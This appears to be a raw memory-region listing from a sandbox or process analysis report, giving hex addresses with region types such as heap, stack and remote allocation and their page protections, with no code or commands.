page execute and read and write
35F000
heap
page read and write
2277000
heap
page read and write
7FFFFF88000
trusted library allocation
page readonly
5557000
heap
page read and write
2D33000
trusted library allocation
page read and write
56CE000
heap
page read and write
4C89000
heap
page read and write
A02F000
direct allocation
page execute and read and write
1DE8000
heap
page read and write
465000
heap
page read and write
4BCF000
stack
page read and write
686000
heap
page read and write
4A6C000
heap
page read and write
2217D000
stack
page read and write
7FE89880000
trusted library allocation
page read and write
56B0000
heap
page read and write
392000
heap
page read and write
569F000
heap
page read and write
6CC000
heap
page read and write
1A82E000
stack
page read and write
48C0000
heap
page read and write
3286000
trusted library allocation
page read and write
21C000
stack
page read and write
170000
trusted library section
page read and write
28C6000
trusted library allocation
page read and write
46B0000
heap
page read and write
5550000
heap
page read and write
2623000
trusted library allocation
page read and write
2A09000
trusted library allocation
page read and write
48F9000
heap
page read and write
401000
unkown
page execute read
160000
trusted library section
page read and write
4FF000
stack
page read and write
1B61E000
stack
page read and write
50DA000
heap
page read and write
56B5000
heap
page read and write
1ABD9000
stack
page read and write
10000
heap
page read and write
4C7000
direct allocation
page read and write
6A7A000
heap
page read and write
40A000
unkown
page write copy
2D42000
trusted library allocation
page read and write
56A1000
heap
page read and write
10000
heap
page read and write
574000
heap
page read and write
20000
heap
page read and write
569F000
heap
page read and write
4BD000
heap
page read and write
3414000
heap
page read and write
3D0000
trusted library allocation
page read and write
4856000
heap
page read and write
46A2000
heap
page read and write
408000
unkown
page readonly
401000
unkown
page execute read
7BF000
heap
page read and write
3403000
heap
page read and write
372000
heap
page read and write
35FA000
trusted library allocation
page read and write
3AC000
heap
page read and write
1C2000
trusted library allocation
page read and write
47B0000
heap
page execute and read and write
4F7E000
stack
page read and write
2AEC000
trusted library allocation
page read and write
3375000
heap
page read and write
55C000
heap
page read and write
1E63000
direct allocation
page read and write
4741000
heap
page read and write
1BED000
heap
page read and write
250000
heap
page read and write
5B5000
heap
page read and write
6EB000
heap
page read and write
5C4E000
heap
page read and write
22FF000
stack
page read and write
7FE8B120000
trusted library allocation
page read and write
3A0000
heap
page read and write
24B0000
trusted library allocation
page read and write
288000
trusted library allocation
page read and write
41F000
system
page execute and read and write
21E60000
heap
page read and write
5C6000
heap
page read and write
3CE000
heap
page read and write
312A000
trusted library allocation
page read and write
5656000
heap
page read and write
4AE000
heap
page read and write
290000
heap
page read and write
12531000
trusted library allocation
page read and write
B00000
trusted library allocation
page execute and read and write
4660000
heap
page read and write
33F0000
heap
page read and write
6C5000
heap
page read and write
328A000
trusted library allocation
page read and write
1B2E0000
heap
page read and write
10000
heap
page read and write
574000
heap
page read and write
89000
stack
page read and write
9FF1000
direct allocation
page execute and read and write
372000
heap
page read and write
3375000
heap
page read and write
5540000
heap
page read and write
47E3000
heap
page read and write
2A0B000
trusted library allocation
page read and write
4FD000
heap
page read and write
569F000
heap
page read and write
5D42000
heap
page read and write
554D000
heap
page read and write
61E6000
heap
page read and write
45C000
unkown
page readonly
48DA000
heap
page read and write
7FFFFF84000
trusted library allocation
page readonly
2213C000
stack
page read and write
5548000
heap
page read and write
35FD000
trusted library allocation
page read and write
560000
heap
page read and write
28AF000
stack
page read and write
7FE89830000
trusted library allocation
page read and write
4D90000
heap
page read and write
A0FD000
direct allocation
page execute and read and write
4B8000
heap
page read and write
31B4000
trusted library allocation
page read and write
3E5000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
379000
heap
page read and write
5656000
heap
page read and write
36B000
heap
page read and write
A0A9000
direct allocation
page execute and read and write
A071000
direct allocation
page execute and read and write
33F3000
heap
page read and write
2C0000
direct allocation
page read and write
2B1C000
trusted library allocation
page read and write
8D5000
trusted library allocation
page execute and read and write
3CD0000
trusted library allocation
page read and write
9D0000
heap
page execute and read and write
616E000
stack
page read and write
23A000
heap
page read and write
2EE000
stack
page read and write
2941000
trusted library allocation
page read and write
575000
heap
page read and write
1BEB000
heap
page read and write
6D4000
heap
page read and write
510000
heap
page execute and read and write
1ACDC000
stack
page read and write
45C000
unkown
page readonly
9B0000
trusted library allocation
page execute and read and write
1CBFE000
stack
page read and write
48A0000
heap
page read and write
1A78000
remote allocation
page execute and read and write
2D39000
trusted library allocation
page read and write
2CC0000
trusted library allocation
page read and write
4852000
heap
page read and write
5550000
heap
page read and write
56AD000
heap
page read and write
29BD000
trusted library allocation
page read and write
20000
heap
page read and write
5CAE000
stack
page read and write
46C9000
heap
page read and write
2C24000
trusted library allocation
page read and write
7FE8B023000
trusted library allocation
page read and write
638F000
heap
page read and write
537E000
stack
page read and write
26EF000
stack
page read and write
478C000
heap
page read and write
597000
heap
page read and write
555E000
stack
page read and write
1CAA000
heap
page read and write
A0AF000
direct allocation
page execute and read and write
1DBE000
stack
page read and write
990000
direct allocation
page read and write
2477000
heap
page read and write
4A3000
unkown
page readonly
130000
direct allocation
page read and write
4858000
heap
page read and write
401000
unkown
page execute read
650000
heap
page read and write
60BE000
stack
page read and write
48A000
heap
page read and write
400000
unkown
page readonly
38E000
stack
page read and write
482F000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
45C000
unkown
page readonly
3BC000
heap
page read and write
61F9000
heap
page read and write
492E000
stack
page read and write
554B000
heap
page read and write
5B0F000
heap
page read and write
61A000
heap
page read and write
4790000
heap
page read and write
2F55000
trusted library allocation
page read and write
A104000
direct allocation
page execute and read and write
6C6000
heap
page read and write
1C304000
heap
page read and write
46F000
unkown
page readonly
1AFA4000
heap
page read and write
2FE000
stack
page read and write
21EC0000
heap
page read and write
45C000
unkown
page readonly
557000
heap
page read and write
3E6F000
heap
page read and write
65F000
heap
page read and write
6A37000
heap
page read and write
2A9000
heap
page read and write
1C12F000
stack
page read and write
2450000
trusted library allocation
page read and write
434000
trusted library allocation
page read and write
4B2B000
stack
page read and write
2F65000
trusted library allocation
page read and write
3E7E000
heap
page read and write
2123000
heap
page read and write
16F000
trusted library allocation
page read and write
29A000
heap
page read and write
25EF000
stack
page read and write
315000
heap
page read and write
21D3000
heap
page read and write
585E000
heap
page read and write
4F75000
heap
page read and write
344000
heap
page read and write
4B0000
heap
page read and write
3374000
heap
page read and write
1D90000
direct allocation
page read and write
3E8E000
heap
page read and write
5B62000
heap
page read and write
48DC000
stack
page read and write
970000
trusted library allocation
page read and write
26BF000
stack
page read and write
3419000
heap
page read and write
4A3000
unkown
page readonly
1ABC2000
heap
page read and write
33BC000
heap
page read and write
370000
heap
page read and write
48F9000
heap
page read and write
80FF000
stack
page read and write
EE0000
direct allocation
page read and write
55C000
heap
page read and write
2528000
heap
page read and write
6BC000
heap
page read and write
56AD000
heap
page read and write
2700000
heap
page read and write
56A000
heap
page read and write
5866000
heap
page read and write
379000
heap
page read and write
246F000
stack
page read and write
6AE000
heap
page read and write
5BD8000
heap
page read and write
3D9C000
heap
page read and write
620A000
heap
page read and write
6159000
heap
page read and write
574000
heap
page read and write
7FE8B179000
trusted library allocation
page read and write
27F0000
trusted library allocation
page read and write
28E7000
trusted library allocation
page read and write
A056000
direct allocation
page execute and read and write
974000
heap
page read and write
565D000
heap
page read and write
7FE89930000
trusted library allocation
page read and write
370000
heap
page read and write
5B9D000
heap
page read and write
631000
heap
page read and write
341E000
heap
page read and write
320000
heap
page read and write
56CE000
heap
page read and write
6E4000
heap
page read and write
3AC0000
heap
page read and write
1F6D000
heap
page read and write
1C54E000
heap
page read and write
3FE000
heap
page read and write
920000
trusted library allocation
page read and write
5656000
heap
page read and write
2140000
heap
page read and write
2D3F000
trusted library allocation
page read and write
1F7000
heap
page read and write
51D000
heap
page read and write
3878000
remote allocation
page execute and read and write
194000
trusted library allocation
page read and write
61FE000
heap
page read and write
506B000
stack
page read and write
3E23000
heap
page read and write
A09D000
direct allocation
page execute and read and write
45C000
unkown
page readonly
3E6A000
heap
page read and write
10000
heap
page read and write
5CAC000
heap
page read and write
27DE000
stack
page read and write
575000
heap
page read and write
46A2000
heap
page read and write
18D000
direct allocation
page read and write
CC0000
trusted library allocation
page read and write
1A420000
heap
page read and write
800000
trusted library allocation
page read and write
2421000
trusted library allocation
page read and write
56B0000
heap
page read and write
60E3000
heap
page read and write
3BB0000
trusted library allocation
page read and write
361000
heap
page read and write
408000
unkown
page readonly
2940000
trusted library allocation
page read and write
4A70000
heap
page execute and read and write
173000
direct allocation
page read and write
3E0F000
heap
page read and write
F8E000
stack
page read and write
8C0000
trusted library allocation
page read and write
328D000
trusted library allocation
page read and write
2223E000
stack
page read and write
3AB000
direct allocation
page read and write
1CA1000
heap
page read and write
3E71000
heap
page read and write
310000
heap
page read and write
490000
heap
page read and write
3EE000
heap
page read and write
2173000
heap
page read and write
174000
heap
page read and write
A0AD000
direct allocation
page execute and read and write
47C0000
heap
page read and write
219F000
stack
page read and write
3CE000
heap
page read and write
989000
trusted library allocation
page read and write
1C1AD000
stack
page read and write
1A9C6000
heap
page read and write
36D000
heap
page read and write
7FE8B030000
trusted library allocation
page execute and read and write
418000
unkown
page read and write
5FA000
heap
page read and write
2700000
trusted library allocation
page read and write
1E30000
direct allocation
page read and write
46F000
unkown
page readonly
568F000
heap
page read and write
7FE895E0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
3E5000
heap
page read and write
56CC000
heap
page read and write
3FE000
stack
page read and write
46F6000
heap
page read and write
36F0000
heap
page read and write
3450000
trusted library allocation
page read and write
5B3E000
heap
page read and write
5CDB000
heap
page read and write
1C61000
heap
page read and write
4887000
heap
page read and write
682000
heap
page read and write
3410000
heap
page read and write
3403000
heap
page read and write
48FB000
heap
page read and write
681000
heap
page read and write
1E44000
heap
page read and write
1E2C000
heap
page read and write
50F000
heap
page read and write
2F0000
heap
page read and write
56B7000
heap
page read and write
1BA000
trusted library allocation
page execute and read and write
6D5000
heap
page read and write
36B000
heap
page read and write
2478000
remote allocation
page execute and read and write
54DC000
stack
page read and write
DCF000
stack
page read and write
525000
heap
page read and write
554B000
heap
page read and write
55F000
heap
page read and write
870000
trusted library allocation
page execute and read and write
3CF000
stack
page read and write
597000
heap
page read and write
408000
unkown
page readonly
A102000
direct allocation
page execute and read and write
153000
trusted library allocation
page execute and read and write
16C000
stack
page read and write
890000
direct allocation
page read and write
631000
heap
page read and write
960000
trusted library allocation
page execute and read and write
4B5E000
stack
page read and write
4703000
heap
page read and write
60FA000
heap
page read and write
378A000
trusted library allocation
page read and write
3E63000
heap
page read and write
1DE0000
heap
page read and write
401000
unkown
page execute read
D6E000
stack
page read and write
2200000
trusted library allocation
page read and write
4FF5000
heap
page read and write
400000
unkown
page readonly
1C421000
heap
page read and write
747000
heap
page read and write
5868000
heap
page read and write
39E000
heap
page read and write
2524000
heap
page read and write
568F000
heap
page read and write
150000
trusted library allocation
page read and write
285000
heap
page read and write
4A7D000
heap
page read and write
190000
direct allocation
page read and write
381000
heap
page read and write
388A000
stack
page read and write
240000
heap
page read and write
7FE89980000
trusted library allocation
page read and write
1D70000
direct allocation
page read and write
3E7E000
heap
page read and write
7B7000
heap
page read and write
3580000
trusted library allocation
page read and write
2952000
trusted library allocation
page read and write
40A000
unkown
page write copy
292A000
trusted library allocation
page read and write
408000
unkown
page readonly
A014000
direct allocation
page execute and read and write
2CF000
stack
page read and write
3E64000
heap
page read and write
263F000
stack
page read and write
512D000
stack
page read and write
5D0A000
heap
page read and write
A0A7000
direct allocation
page execute and read and write
1CA5B000
stack
page read and write
401000
unkown
page execute read
692000
heap
page read and write
340000
heap
page read and write
2227F000
stack
page read and write
4A3000
unkown
page readonly
58C1000
heap
page read and write
1CB1000
heap
page read and write
48E0000
trusted library allocation
page read and write
5590000
heap
page read and write
160000
heap
page read and write
A06F000
direct allocation
page execute and read and write
400000
unkown
page readonly
7FE8B0A0000
trusted library allocation
page read and write
24A0000
trusted library allocation
page read and write
507E000
stack
page read and write
3451000
trusted library allocation
page read and write
4B3000
heap
page read and write
400000
system
page execute and read and write
2B0000
heap
page read and write
23BF000
stack
page read and write
18C000
stack
page read and write
6550000
direct allocation
page execute and read and write
5C42000
heap
page read and write
7FE8AF2C000
trusted library allocation
page execute and read and write
7FFFFF81000
trusted library allocation
page execute read
1C5F0000
heap
page read and write
2500000
trusted library allocation
page read and write
340C000
heap
page read and write
516E000
stack
page read and write
400E000
stack
page read and write
3C80000
trusted library allocation
page read and write
6EC000
heap
page read and write
221BE000
stack
page read and write
403F000
stack
page read and write
587000
heap
page read and write
26C0000
trusted library allocation
page read and write
3689000
trusted library allocation
page read and write
24F3000
trusted library allocation
page read and write
5550000
heap
page read and write
46CD000
heap
page read and write
5B1B000
heap
page read and write
401000
unkown
page execute read
408000
unkown
page readonly
A064000
direct allocation
page execute and read and write
7FE89680000
trusted library allocation
page read and write
47E1000
heap
page read and write
280000
heap
page read and write
2277000
heap
page read and write
170000
direct allocation
page read and write
427000
unkown
page read and write
4859000
heap
page read and write
1A99F000
heap
page read and write
6B0000
heap
page read and write
341E000
heap
page read and write
1D1F000
stack
page read and write
554D000
heap
page read and write
3E73000
heap
page read and write
1D0000
trusted library allocation
page read and write
569D000
heap
page read and write
7FE895D4000
trusted library allocation
page read and write
456000
system
page execute and read and write
A031000
direct allocation
page execute and read and write
36D000
heap
page read and write
35D000
heap
page read and write
7FE897B4000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
63AB000
heap
page read and write
5FC7000
heap
page read and write
150000
trusted library allocation
page read and write
2C54000
trusted library allocation
page read and write
3479000
trusted library allocation
page read and write
500E000
stack
page read and write
2770000
heap
page read and write
8D000
stack
page read and write
46F9000
heap
page read and write
4AD1000
trusted library allocation
page read and write
3CC000
heap
page read and write
3410000
heap
page read and write
A02B000
direct allocation
page execute and read and write
40A000
unkown
page write copy
6DD000
heap
page read and write
1B77F000
stack
page read and write
5552000
heap
page read and write
A114000
direct allocation
page execute and read and write
50FE000
heap
page read and write
30F000
stack
page read and write
27EF000
stack
page read and write
46F000
unkown
page readonly
1F20000
heap
page read and write
34E000
stack
page read and write
44E0000
trusted library allocation
page read and write
558000
heap
page read and write
BD0000
trusted library allocation
page read and write
5D45000
heap
page read and write
408000
unkown
page readonly
6350000
heap
page read and write
4705000
heap
page read and write
609C000
heap
page read and write
31E2000
trusted library allocation
page read and write
4A6C000
heap
page read and write
459000
system
page execute and read and write
482F000
heap
page read and write
50B000
heap
page read and write
6D1000
heap
page read and write
10000
heap
page read and write
4C78000
remote allocation
page execute and read and write
A062000
direct allocation
page execute and read and write
1C61000
heap
page read and write
4C0000
trusted library allocation
page read and write
36CA000
trusted library allocation
page read and write
5CCF000
heap
page read and write
A0BB000
direct allocation
page execute and read and write
401000
unkown
page execute read
74F000
heap
page read and write
300000
heap
page read and write
379000
heap
page read and write
1F30000
heap
page execute and read and write
1A9DB000
heap
page read and write
2A7B000
trusted library allocation
page read and write
5868000
heap
page read and write
4A2D000
stack
page read and write
2A07000
trusted library allocation
page read and write
21CA000
heap
page read and write
7FFFFF88000
trusted library allocation
page readonly
66C000
heap
page read and write
55F000
heap
page read and write
250000
heap
page read and write
1FD0000
heap
page read and write
2E0000
direct allocation
page read and write
5FD3000
heap
page read and write
30B000
heap
page read and write
211A000
heap
page read and write
677000
heap
page read and write
2D3A000
trusted library allocation
page read and write
456000
system
page execute and read and write
A051000
direct allocation
page execute and read and write
220BE000
stack
page read and write
7FE89946000
trusted library allocation
page read and write
1C258000
heap
page read and write
4A3000
unkown
page readonly
625000
heap
page read and write
56B000
heap
page read and write
1E63000
direct allocation
page read and write
2D3000
trusted library allocation
page read and write
46C9000
heap
page read and write
283000
heap
page read and write
2460000
trusted library allocation
page read and write
617C000
heap
page read and write
A106000
direct allocation
page execute and read and write
328A000
trusted library allocation
page read and write
511E000
stack
page read and write
46F000
unkown
page readonly
400000
system
page execute and read and write
568F000
heap
page read and write
A068000
direct allocation
page execute and read and write
56CC000
heap
page read and write
1CB1F000
stack
page read and write
8D2000
trusted library allocation
page read and write
6358000
heap
page read and write
3278000
trusted library allocation
page read and write
3AB4000
trusted library allocation
page read and write
3C5E000
stack
page read and write
81FF000
stack
page read and write
332E000
heap
page read and write
4490000
trusted library allocation
page execute and read and write
804000
trusted library allocation
page read and write
2818000
trusted library allocation
page read and write
5830000
heap
page read and write
35F000
heap
page read and write
2CEB000
heap
page read and write
420000
trusted library allocation
page read and write
860000
trusted library allocation
page read and write
6164000
heap
page read and write
3403000
heap
page read and write
1A6D8000
heap
page execute and read and write
2E78000
remote allocation
page execute and read and write
810000
trusted library allocation
page read and write
2A0000
trusted library allocation
page execute and read and write
7F0000
trusted library allocation
page read and write
97000
stack
page read and write
86E000
stack
page read and write
7FE8B0F0000
trusted library allocation
page read and write
360000
heap
page read and write
340A000
heap
page read and write
33F9000
heap
page read and write
266000
heap
page read and write
6D8000
heap
page read and write
3DDE000
heap
page read and write
1B1C0000
heap
page read and write
5FEB000
heap
page read and write
2519000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
1C4D6000
heap
page read and write
223E000
stack
page read and write | page guard
4831000
heap
page read and write
46C9000
heap
page read and write
59D000
heap
page read and write
1C24E000
stack
page read and write
3E6B000
heap
page read and write
408000
unkown
page readonly
537000
heap
page read and write
569D000
heap
page read and write
1CC0000
heap
page execute and read and write
285000
heap
page read and write
390000
direct allocation
page read and write
350000
heap
page read and write
3AD000
direct allocation
page read and write
377B000
stack
page read and write
29A000
heap
page read and write
1D30000
direct allocation
page read and write
215F000
stack
page read and write
5578000
heap
page read and write
17A000
trusted library allocation
page read and write
256E000
stack
page read and write
130000
trusted library allocation
page read and write
509F000
stack
page read and write
23F000
stack
page read and write
5CA000
heap
page read and write
4A7C000
heap
page read and write
3B0000
direct allocation
page read and write
222FF000
stack
page read and write
252B000
heap
page read and write
4C0000
heap
page read and write
A053000
direct allocation
page execute and read and write
304000
heap
page execute and read and write
A112000
direct allocation
page execute and read and write
910000
trusted library allocation
page read and write
6078000
heap
page read and write
7FE8978C000
trusted library allocation
page read and write
2BC6000
trusted library allocation
page read and write
4DE000
heap
page read and write
20F000
stack
page read and write
33BC000
heap
page read and write
56BA000
heap
page read and write
BE0000
heap
page execute and read and write
4900000
heap
page read and write
6D4000
heap
page read and write
27AB000
heap
page read and write
4BB0000
direct allocation
page execute and read and write
5868000
heap
page read and write
26A000
heap
page read and write
473000
system
page execute and read and write
6032000
heap
page read and write
35D000
heap
page read and write
21C9E000
stack
page read and write
48DE000
stack
page read and write
4C7D000
stack
page read and write
36D000
stack
page read and write
5BB0000
trusted library allocation
page read and write
45C000
unkown
page readonly
340C000
heap
page read and write
910000
heap
page read and write
A116000
direct allocation
page execute and read and write
5869000
heap
page read and write
1AC5F000
stack
page read and write
379000
heap
page read and write
7FE89787000
trusted library allocation
page read and write
7FE8AF56000
trusted library allocation
page execute and read and write
53BE000
stack
page read and write
E80000
trusted library allocation
page read and write
1ABBE000
heap
page read and write
401000
unkown
page execute read
3451000
trusted library allocation
page read and write
670000
heap
page read and write
4857000
heap
page read and write
354000
heap
page read and write
4B6000
heap
page read and write
593000
heap
page read and write
3E6D000
heap
page read and write
265000
stack
page read and write
4A3000
unkown
page readonly
99C000
heap
page read and write
7FE8B210000
trusted library allocation
page read and write
46A3000
heap
page read and write
6BF000
stack
page read and write
393000
heap
page read and write
7FE8B080000
trusted library allocation
page read and write
320000
heap
page read and write
590000
heap
page read and write
38E000
heap
page read and write
7FE8B090000
trusted library allocation
page read and write
4857000
heap
page read and write
1D50000
direct allocation
page read and write
485000
heap
page read and write
400000
unkown
page readonly
3EE000
stack
page read and write
7FE89960000
trusted library allocation
page read and write
48CE000
stack
page read and write
585E000
heap
page read and write
3E0F000
heap
page read and write
252E000
trusted library allocation
page read and write
48F9000
heap
page read and write
E30000
direct allocation
page read and write
7FE8AF20000
trusted library allocation
page read and write
1E1F000
stack
page read and write
45C000
unkown
page readonly
3370000
heap
page read and write
A0B3000
direct allocation
page execute and read and write
5557000
heap
page read and write
3220000
heap
page read and write
56B000
heap
page read and write
6C9000
heap
page read and write
52BE000
stack
page read and write
280000
heap
page read and write
1C94E000
stack
page read and write
3CC000
heap
page read and write
58BA000
heap
page read and write
40A000
unkown
page write copy
20000
heap
page read and write
180000
heap
page read and write
50B000
heap
page read and write
22D81000
heap
page read and write
2A50000
heap
page read and write
43C000
heap
page read and write
34F0000
heap
page read and write
33F3000
heap
page read and write
290000
heap
page read and write
F00000
trusted library allocation
page read and write
3E6F000
heap
page read and write
610000
heap
page read and write
56D3000
heap
page read and write
24A0000
heap
page read and write
2D3B000
trusted library allocation
page read and write
A052000
direct allocation
page execute and read and write
5552000
heap
page read and write
5B79000
heap
page read and write
1A5E9000
stack
page read and write
4AE6000
heap
page read and write
228A000
heap
page read and write
3F7000
heap
page read and write
5FE000
heap
page read and write
1C1E000
stack
page read and write
3669000
trusted library allocation
page read and write
A10A000
direct allocation
page execute and read and write
427000
unkown
page read and write
A0D000
heap
page read and write
53A000
heap
page read and write
3285000
trusted library allocation
page read and write
270F000
stack
page read and write
6238000
heap
page read and write
61DA000
heap
page read and write
4A3000
unkown
page readonly
328C000
trusted library allocation
page read and write
10000
heap
page read and write
4852000
heap
page read and write
45C000
unkown
page readonly
6CC000
heap
page read and write
21F7D000
stack
page read and write
5D24000
heap
page read and write
569F000
heap
page read and write
358000
heap
page read and write
7FE8B240000
trusted library allocation
page read and write
574000
heap
page read and write
253000
heap
page read and write
2E0000
heap
page read and write
1CC8000
heap
page execute and read and write
7FE8B070000
trusted library allocation
page read and write
3C70000
trusted library allocation
page read and write
4FC8000
heap
page read and write
2E4F000
stack
page read and write
5AEC000
heap
page read and write
3E11000
heap
page read and write
3650000
trusted library allocation
page read and write
4FBC000
stack
page read and write
401000
unkown
page execute read
1DCC000
heap
page read and write
380000
heap
page read and write
2116000
heap
page read and write
16C000
stack
page read and write
45C000
unkown
page readonly
3419000
heap
page read and write
4A3000
unkown
page readonly
A010000
direct allocation
page execute and read and write
400000
unkown
page readonly
472B000
stack
page read and write
519000
heap
page read and write
33F0000
heap
page read and write
22D000
heap
page read and write
56BA000
heap
page read and write
393000
heap
page read and write
3A1B000
stack
page read and write
279B000
trusted library allocation
page read and write
4A6C000
heap
page read and write
1CAD000
heap
page read and write
46AA000
heap
page read and write
5170000
heap
page read and write
CD0000
heap
page read and write
7FE8B052000
trusted library allocation
page read and write
10000
heap
page read and write
357E000
stack
page read and write
58BA000
heap
page read and write
E26000
heap
page execute and read and write
3C75000
trusted library allocation
page read and write
568F000
heap
page read and write
6A7A000
heap
page read and write
1C48000
heap
page read and write
33DD000
heap
page read and write
6C8000
heap
page read and write
FB0000
trusted library allocation
page read and write
1C9B000
heap
page read and write
3320000
heap
page read and write
3419000
heap
page read and write
46B0000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
341E000
heap
page read and write
2366000
heap
page read and write
4CD0000
heap
page read and write
3E6D000
heap
page read and write
395000
heap
page read and write
A108000
direct allocation
page execute and read and write
51CF000
stack
page read and write
4C7000
direct allocation
page read and write
35F000
heap
page read and write
38D000
heap
page read and write
3DC2000
heap
page read and write
830000
direct allocation
page read and write
28B0000
trusted library allocation
page read and write
1C98000
heap
page read and write
6C5000
heap
page read and write
3DDE000
heap
page read and write
40A000
unkown
page write copy
F60000
trusted library allocation
page read and write
327E000
trusted library allocation
page read and write
6002000
heap
page read and write
1B1A6000
heap
page read and write
5BBB000
heap
page read and write
3EE000
stack
page read and write
574000
heap
page read and write
1B03F000
stack
page read and write
5830000
heap
page read and write
46F000
unkown
page readonly
40A000
unkown
page write copy
7FE896B6000
trusted library allocation
page execute and read and write
870000
direct allocation
page read and write
5656000
heap
page read and write
56BA000
heap
page read and write
46BF000
heap
page read and write
4C7000
heap
page read and write
12431000
trusted library allocation
page read and write
41F000
system
page execute and read and write
2580000
trusted library allocation
page read and write
56BD000
heap
page read and write
46A2000
heap
page read and write
43F000
heap
page read and write
4FE2000
heap
page read and write
230000
direct allocation
page read and write
7FE8B160000
trusted library allocation
page read and write
597000
heap
page read and write
2CA0000
remote allocation
page read and write
21CA3000
heap
page read and write
31CE000
stack
page read and write
5A3000
heap
page read and write
4360000
heap
page read and write
DC0000
direct allocation
page read and write
7DF000
stack
page read and write
2230000
heap
page read and write
401000
unkown
page execute read
48EB000
stack
page read and write
400000
system
page execute and read and write
18B000
direct allocation
page read and write
569F000
heap
page read and write
4F4000
heap
page read and write
E60000
direct allocation
page read and write
FCC000
stack
page read and write
4833000
heap
page read and write
D70000
trusted library allocation
page read and write
51F000
heap
page read and write
5BBC000
heap
page read and write
89000
stack
page read and write
4707000
heap
page read and write
2477000
heap
page read and write
64C000
heap
page read and write
46F000
unkown
page readonly
21D5000
heap
page read and write
1CB6000
heap
page read and write
240000
trusted library allocation
page read and write
3414000
heap
page read and write
7FE8B140000
trusted library allocation
page read and write
67B000
heap
page read and write
2813000
trusted library allocation
page read and write
A092000
direct allocation
page execute and read and write
8C000
stack
page read and write
4EBB000
stack
page read and write
DD0000
direct allocation
page read and write
49F7000
trusted library allocation
page read and write
3343000
heap
page read and write
365000
heap
page read and write
1CB1000
heap
page read and write
26F000
stack
page read and write
10000
heap
page read and write
3DC6000
heap
page read and write
4661000
heap
page read and write
590000
heap
page read and write
55E000
heap
page read and write
4D6000
heap
page read and write
49DE000
stack
page read and write
676000
heap
page read and write
55E000
heap
page read and write
48E0000
trusted library allocation
page read and write
591000
heap
page read and write
2BAA000
trusted library allocation
page read and write
367000
heap
page read and write
32B0000
trusted library allocation
page read and write
435000
unkown
page read and write
686000
heap
page read and write
1DFF000
stack
page read and write
40A000
unkown
page write copy
63A000
heap
page read and write
591000
heap
page read and write
4F2000
heap
page read and write
1C76000
heap
page read and write
5633000
heap
page read and write
2C0000
trusted library section
page read and write
7FFFFF80000
trusted library allocation
page readonly
410000
trusted library section
page read and write
37E000
stack
page read and write
8BF000
stack
page read and write
68B000
heap
page read and write
217E000
heap
page read and write
5E20000
heap
page read and write
A09F000
direct allocation
page execute and read and write
491000
heap
page read and write
500000
heap
page read and write
1ABB0000
heap
page read and write
3A6000
heap
page read and write
3A0E000
stack
page read and write
7FE8B010000
trusted library allocation
page read and write
2513000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
A0DC000
direct allocation
page execute and read and write
3D10000
heap
page read and write
10000
heap
page read and write
4856000
heap
page read and write
2470000
heap
page read and write
4835000
heap
page read and write
12451000
trusted library allocation
page read and write
1C40E000
stack
page read and write
1BC0000
heap
page read and write
2F5000
heap
page read and write
1C3F2000
heap
page read and write
39D000
heap
page read and write
2944000
trusted library allocation
page read and write
4D0000
heap
page read and write
2D35000
trusted library allocation
page read and write
3850000
trusted library allocation
page read and write
5810000
heap
page read and write
643000
heap
page read and write
535000
heap
page read and write
5FB0000
heap
page read and write
2F2000
heap
page read and write
50FC000
heap
page read and write
8C0000
trusted library allocation
page read and write
1EC0000
heap
page read and write
1AD5E000
stack
page read and write
45D000
system
page execute and read and write
33FF000
heap
page read and write
6B0000
heap
page read and write
A0E4000
direct allocation
page execute and read and write
373000
heap
page read and write
307000
trusted library allocation
page read and write
1E32000
heap
page read and write
2D3E000
trusted library allocation
page read and write
4E9000
heap
page read and write
3A0000
heap
page read and write
601A000
heap
page read and write
4854000
heap
page read and write
68B000
heap
page read and write
57D000
heap
page read and write
365000
heap
page read and write
2513000
trusted library allocation
page read and write
4A69000
heap
page read and write
3279000
trusted library allocation
page read and write
4A3000
unkown
page readonly
3DC6000
heap
page read and write
21B0000
heap
page read and write
7FE8B054000
trusted library allocation
page read and write
50F000
heap
page read and write
422000
unkown
page read and write
21CD0000
trusted library allocation
page read and write
6BF000
heap
page read and write
69F000
heap
page read and write
2A0000
heap
page read and write
288000
trusted library allocation
page read and write
22C81000
heap
page read and write
A0BF000
direct allocation
page execute and read and write
400000
system
page execute and read and write
4A3E000
stack
page read and write
4A7C000
heap
page read and write
26FF000
stack
page read and write
4BF000
stack
page read and write
2940000
trusted library allocation
page read and write
A0A1000
direct allocation
page execute and read and write
48F9000
heap
page read and write
21DD0000
heap
page read and write
52F000
stack
page read and write
5552000
heap
page read and write
A100000
direct allocation
page execute and read and write
62C000
heap
page read and write
3278000
trusted library allocation
page read and write
28AE000
trusted library allocation
page read and write
375000
heap
page read and write
6106000
heap
page read and write
4880000
trusted library allocation
page read and write
34C0000
trusted library allocation
page read and write
2974000
trusted library allocation
page read and write
4E4000
heap
page read and write
2A0000
direct allocation
page read and write
5CFF000
heap
page read and write
1C44F000
heap
page read and write
40A000
unkown
page write copy
20000
heap
page read and write
7FE89870000
trusted library allocation
page read and write
8270000
heap
page read and write
49F000
heap
page read and write
1D0000
heap
page read and write
306C000
stack
page read and write
40A000
unkown
page read and write
A090000
direct allocation
page execute and read and write
260000
heap
page read and write
340C000
heap
page read and write
249E000
stack
page read and write
51A3000
heap
page read and write
4BE000
stack
page read and write
374000
heap
page read and write
1C30000
heap
page read and write
1DAF000
stack
page read and write
3B0000
direct allocation
page read and write
3E7E000
heap
page read and write
686000
heap
page read and write
46BF000
heap
page read and write
2370000
heap
page read and write
56BA000
heap
page read and write
5180000
heap
page read and write
5D1E000
stack
page read and write
45C000
unkown
page readonly
56CC000
heap
page read and write
2D45000
trusted library allocation
page read and write
5620000
heap
page read and write
4C3000
heap
page read and write
3E7C000
heap
page read and write
379000
heap
page read and write
579000
heap
page read and write
46B9000
heap
page read and write
40A000
unkown
page write copy
7FE8B180000
trusted library allocation
page read and write
CED000
stack
page read and write
400000
unkown
page readonly
7FFFFF84000
trusted library allocation
page readonly
22D22000
heap
page read and write
393000
heap
page read and write
2620000
heap
page execute and read and write
236A000
heap
page read and write
46F000
unkown
page readonly
1ABCA000
heap
page read and write
579000
heap
page read and write
381000
heap
page read and write
883000
heap
page read and write
A0B2000
direct allocation
page execute and read and write
22680000
heap
page read and write
4A3000
unkown
page readonly
167000
stack
